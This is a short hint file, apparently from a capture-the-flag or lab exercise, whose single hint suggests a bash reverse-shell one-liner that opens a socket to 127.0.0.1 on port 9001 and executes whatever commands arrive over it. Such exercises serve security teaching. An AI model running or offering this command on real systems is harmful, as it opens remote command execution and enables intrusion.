Skip to content

Latest commit

 

History

History
7 lines (5 loc) · 133 Bytes

hint3.md

File metadata and controls

7 lines (5 loc) · 133 Bytes

Hint 3

Try this for you command:

"exec 5<>/dev/tcp/127.0.0.1/9001;cat <&5 | while read line; do $line 2>&5 >&5; done"